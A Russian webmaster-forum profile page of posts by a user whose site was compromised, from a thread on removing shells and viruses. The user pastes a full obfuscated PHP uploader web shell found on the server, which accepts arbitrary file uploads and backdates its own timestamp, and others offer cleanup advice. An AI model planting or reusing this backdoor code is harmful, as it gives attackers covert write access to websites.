loed

loed
Рейтинг
196
Регистрация
10.03.2007
Долгоиграющие тексты от 30 рублей, рерайт и копирайт от Аркадия

Обращался к ТС за срочным рерайтом новостей, в итоге получил оперативно выполненную работу с отличной уникальностью! Спасибо большое, буду обращаться еще!

Левый js в коде, откуда?
loed:
Проблема была решена только путем лечения сайта по вменяемой цене и в короткий срок вот тут /ru/forum/842577

поправил... лечили сайт тут /ru/forum/842577

Левый js в коде, откуда?

Проблема была решена только путем лечения сайта по вменяемой цене и в короткий срок вот тут /ru/forum/comment/12791839

Удаление вирусов с сайта, рекомендации и защита сайта, проверка уязвимости сервера!

Обращался к ТС, за ремонтом сайта.... за не большое время и вменяемый ценник левые ссылки были побеждены.....

Общая тема о борьбе с шеллами и вирусами на сайте
draff:
loed,
Смотри в логах access.log запросы POST

все я сдался лечить сам, отдал на лечение...

Общая тема о борьбе с шеллами и вирусами на сайте
draff:
loed,
Права на файлы ставил 444,на папки 555 ?

не помогает....

Общая тема о борьбе с шеллами и вирусами на сайте
Кот в сапогах:
дак он поди, только используй тег code в следующий раз.
"рандомный" набор символов это php код закодированный в base64.
Тебе нужно их декодировать и перевести код в удобочитаемый вид.

Зы также прочитай хотя-бы за $GLOBALS,$_SERVER,$_FILES

это все лежало в файле отдельном не моем, снес его...

Общая тема о борьбе с шеллами и вирусами на сайте

НЕ ОНО ЛИ?

<? $GLOBALS['_935675742_']=Array(base64_decode('aXNfdXBsb2FkZW' .'RfZm' .'lsZQ=='),base64_decode('bW92ZV91cGxv' .'Y' .'W' .'RlZ' .'F9ma' .'Wxl'),base64_decode('dG' .'ltZQ' .'=='),base64_decode('' .'dG91Y2g=')); ?><? function _1402832279($i){$a=Array('PGgxPkxPQUQ8L2gxPgo=','WW91ciBJUDog','UkVNT1RFX0FERFI=','PGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4K','PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVuYW1lIj48YnI+IAo=','PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxPQUQiPjxicj4K','PC9mb3JtPgo=','ZmlsZW5hbWU=','dG1wX25hbWU=','ZmlsZW5hbWU=','dG1wX25hbWU=','ZmlsZW5hbWU=','bmFtZQ==','ZmlsZW5hbWU=','bmFtZQ==','Tk8gRklMRQ==');return base64_decode($a[$i]);} ?><?php print _1402832279(0);echo _1402832279(1);echo $_SERVER[_1402832279(2)];echo _1402832279(3);echo _1402832279(4);echo _1402832279(5);echo _1402832279(6);if($GLOBALS['_935675742_'][0]($_FILES[_1402832279(7)][_1402832279(8)])){$GLOBALS['_935675742_'][1]($_FILES[_1402832279(9)][_1402832279(10)],$_FILES[_1402832279(11)][_1402832279(12)]);$_0=$_FILES[_1402832279(13)][_1402832279(14)];echo"<a href=\"$_0\">$_0</a>";}else{echo(_1402832279(15));}$_1=$_SERVER[SCRIPT_FILENAME];$_2=$GLOBALS['_935675742_'][2]()-round(0+20020720+20020720+20020720+20020720+20020720);$GLOBALS['_935675742_'][3]($_1,$_2); ?>

</body>

</html>

Общая тема о борьбе с шеллами и вирусами на сайте
wa-lk:
Значит есть доступ к ФТП, или шелл на серваке.
Время изменения документа легко выставляется манипуляцией системного времени на компе/серваке злоумышленника.

фтп вообще закрыто в панели управления.... шел имеете ввиду не на сайте а на сервере? хостер таймвеб утверждает что у них все ок!!! убегать от хостера?

Общая тема о борьбе с шеллами и вирусами на сайте
Кот в сапогах:
loed, Но ты хоть запятые ставь, то непонятно что имеешь веду.
Зы может у тебя скрипт был вшит в html,php странички еще до того как ты их скачал,взял у одноклассника и т.д.?

исключено, все делал сам, кстати заметил когда появляются левые ссылки дата изменения документа не меняется... т.е ссылка появилась 20.04.2014 а дата последнего изменения документа к примеру 08.08.2013....

1... 5678910111213 ...96
Всего: 955